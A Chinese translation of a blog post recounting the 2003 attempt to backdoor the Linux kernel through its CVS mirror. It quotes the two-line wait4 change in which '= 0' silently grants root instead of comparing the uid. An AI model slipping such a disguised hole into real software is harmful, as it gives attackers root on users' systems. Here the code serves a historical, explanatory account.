Linux中國

揭秘!:2003年Linux後門事件

最近Josh寫了一篇文章,講述2006年Debian Linux中出現的一系列安全bug,探討了這些所謂bug是否是NSA植入的後門。(最後他作出結論:可能不是)

今天我想講述的是另外一個事件——2003年某些人試圖在Linux內核中植入後門的故事。這次事件很明確,的確有人想植入後門,只是我們不知道此人是誰,而且,也許永遠都不會知道了。

時間回到2003年,當時Linux使用一套叫做BitKeeper的系統來存儲Linux源代碼的主拷貝。如果開發者想要提交一份針對源碼的修改,就必須經過一套嚴格的審核過程,以決定這份修改是否能夠合併進主拷貝。每個針對主拷貝的修改都必須附帶一段說明,說明當中都包括了一個記錄相應審核過程的鏈接。

但是有些人不喜歡BitKeeper,於是這些開發者們就用另一套叫做CVS的系統(譯註:Linus一直拒絕使用CVS,後來不得已使用了BitKeeper,並在因某些原因BitKeeper不再讓開源社區免費使用後,花了不到一個月的時間自己開發了GIT的原型,並且投入了使用),維護了一份Linux源代碼的拷貝,這樣他們就能隨時按自己喜歡的方式獲取Linux源代碼了。CVS中的代碼其實就是直接克隆了BitKeeper中的代碼。

但是在2003年11月5日的時候,Larry McVoy發現,CVS中的代碼拷貝有一處改動並沒有包含記錄審核的鏈接。調查顯示,這一處改動由陌生人添加,而且從未經過審核,不僅如此,在BitKeeper倉庫的主拷貝中,這一處改動竟然壓根就不存在。經過進一步調查後,可以明確,顯然有人入侵了CVS的伺服器並植入了此處改動。

神秘人物究竟做了哪些改動?這才是真正有趣的地方。改動修改的是Linux中一個叫wait4的函數,程序可以使用該函數進行掛起操作,以等待某些事件的觸發。神秘人物添加的,就是下面這兩行代碼:

if ((options == (WCLONE|WALL)) && (current->uid = 0))

retval = -EINVAL;

[有C語言編程經驗的人也許會問:這兩行代碼有什麼特別的?請接著往下看]

猛地一看,好像這兩行代碼就是一段正常的錯誤校驗代碼,當wait4函數被某種文檔中禁止的方式調用時,wait4就返回一個錯誤代碼。但是一個真正認真的程序猿立刻就會發現代碼中的問題,注意看在第一行末尾,「= 0」應該是「== 0」才對。是的,「== 0」在這裡才是判斷當前運行代碼的用戶ID(current->uid)是否等於0,而「= 0」不但無法判斷,反而修改了用戶ID的值,即,將其值賦值為0

將用戶ID設置為0,這是一個很嚴重的問題,因為ID為0的用戶正是「root」,而root賬戶可以在系統中做任何事情,包括訪問所有數據、修改任意代碼的行為,能夠危及到整個系統各個部分的安全。因此,這段代碼的影響就是通過特殊手段使得任何調用wait4函數的軟體都擁有了root許可權。換句話說,這就是一個典型的後門。

客觀地說,這一招很漂亮。看起來就像是無關緊要的錯誤校驗,但真實身份卻是一個後門。而且它混在其他經過審核的代碼中間,幾乎規避了所有審核可能會注意到自己的可能性。

但是它終究還是失敗了,因為Linux小組有足夠強的責任心,注意到了CVS倉庫中的這段代碼沒有經過常規審核。Linux還是略勝一籌。

這是NSA乾的嗎?只能說有可能。因為有太多擁有技術能力和動機的人有可能實施了此次攻擊。那麼,到底是誰呢?除非某些人主動承認,又或者發現新的確鑿證據,否則,我們將永遠不會知道。

via: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/

本文由 LCTT 原創翻譯,Linux中國 榮譽推出

譯者:tinyeyeser 校對:wxy


本文轉載來自 Linux 中國: https://github.com/Linux-CN/archive

對這篇文章感覺如何?

太棒了
0
不錯
0
愛死了
0
不太好
0
感覺很糟
0
雨落清風。心向陽

    You may also like

    Leave a reply

    您的電子郵箱地址不會被公開。 必填項已用 * 標註

    此站點使用Akismet來減少垃圾評論。了解我們如何處理您的評論數據

    More in:Linux中國